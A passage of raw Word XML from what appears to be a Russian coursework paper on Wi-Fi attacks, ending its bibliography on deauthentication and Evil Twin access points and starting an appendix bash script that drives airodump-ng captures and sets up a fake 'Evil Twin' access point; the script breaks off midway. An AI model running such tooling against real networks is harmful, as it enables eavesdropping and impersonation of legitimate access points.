          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId24">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://frdmtoplay.com/counting-wireless-devices-on-a-raspberry-pi-with-tcpdump/</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="036C19AB" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="3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Деаутентификация клиентов беспроводной сети в Kali Linux. [Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId25">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://hackware.ru/?p=74</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="652168BF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="3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Deauthentication. [Электронный ресурс]. – Электрон</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дан. – Режим доступа: </w:t>
      </w:r>
      <w:hyperlink r:id="rId26">
        <w:r>
          <w:rPr>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:color w:val="000000"/>
            <w:sz w:val="28"/>
            <w:szCs w:val="28"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.aircrack-ng.org/doku.php?id=deauthentication</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBC46FF" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>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rPr>
        <w:t xml:space="preserve">Evil Twin [Электронный ресурс] – Электрон дан. – Режим доступа: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>https://null-byte.wonderhowto.com/news/evil-twin-part-3-full-bash-script-0166207/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AFC75C9" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="357"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Creating an Evil Twin or Fake Access Point on Your Home Network Using Aircrack-ng and Dnsmasq [</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электронный</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">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ресурс</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">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00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Электро</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">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дан</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">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00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Режим</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">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доступа</w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>https://thecybersecurityman.com/2018/08/11/pentest-edition-creating-an-evil-twin-or-fake-access-point-using-aircrack-ng-and-dnsmasq-part-1-setup/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523F6EFE" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRPr="00A7411A" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="6691F158" w14:textId="77777777" w:rsidR="00CB3331" w:rsidRDefault="00CB3331" w:rsidP="00CB3331">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="14" w:name="_heading=h.3dy6vkm" w:colFirst="0" w:colLast="0"/>
      <w:bookmarkStart w:id="15" w:name="_Toc75213390"/>
      <w:bookmarkEnd w:id="14"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Приложение 1</w:t>
      </w:r>
      <w:bookmarkEnd w:id="15"/>
    </w:p>
    <w:p w14:paraId="07E4AC77" w14:textId="77777777" w:rsidR="00CB3331"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Код программы, реализующей все указанные в работе функции:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AB90F7E"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proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>#!/</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="589452CD"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D39703E"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#####Authors: Alexand Melnikov, Alexey Sysoev, Sergei Puzan################</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F93D856"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#####Nicknames: Doctor D. Ildo, Turtle Titan, Brokendick Counterstrike#####</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55DF1E9A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA5DF19"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function option0</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="556CA42A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43E2B04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"Enter your monitor mode interface (wlan1mon): "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A909503"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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>interface</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="47B18768"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A4692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function option1</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="3E63359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sudo airodump-ng $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F0AD630"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wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC7E4EC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A62ABE"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function option2</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="79C2A245"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bssid=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD83CCF"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while [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bssid ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A1A1E6"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echo "Enter the BSSID: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17CCC016"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 xml:space="preserve">read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>bssid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="24F1C31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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69D52A0E"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channel=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31BB54D8"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while [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>channel ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; do</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB2C2AC"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echo "Enter the Channel: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E3496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 xml:space="preserve">read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>channel</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4882E2AF"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603F223F"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"Write File Prefix: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7111C072"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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>writeFilePrefix</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5110D564"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if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>writeFilePrefix ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD74076"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 xml:space="preserve">echo "No Write File </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Specified</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D0AE42"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01B9E715"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writeFile=" -w $writeFilePrefix"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E2C095"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D02F790"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sudo airodump-ng --bssid $bssid -c $channel $writeFile $interface   &amp;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E01B3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wait</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7180E6E4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7926B7D4"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function option3</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(){</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="5D673BB9"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options3=''</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C6AFDD9"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"Evil Twin ESSID: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F995F4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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etEssid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="09E8DA6C"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etEssid ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45101A7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 xml:space="preserve">echo "ESSID not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D4B1D5"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB7075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options3="$options3 --essid $etEssid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57A1F2C4"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AEB38B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echo "Evil Twin </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>BSSID[</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>optional]: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CEAE94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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etBssid</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="4B04B9FD"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if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etBssid ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F5FED4A"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 xml:space="preserve">echo "BSSID not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1EE335"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31FF525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options3="$options3 -a $etBssid"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B072854"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2EBFE"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"Enter the Channel: "</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21444212"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read </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etChannel</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="52A77B5D"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if [ -z $</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>etChannel ]</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E347BE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 xml:space="preserve">echo "Channel not </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>set</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00A7411A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82DE1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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D8F95D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options3="$options3 -c $etChannel"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48741F63"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E5015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echo "Enter the host </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
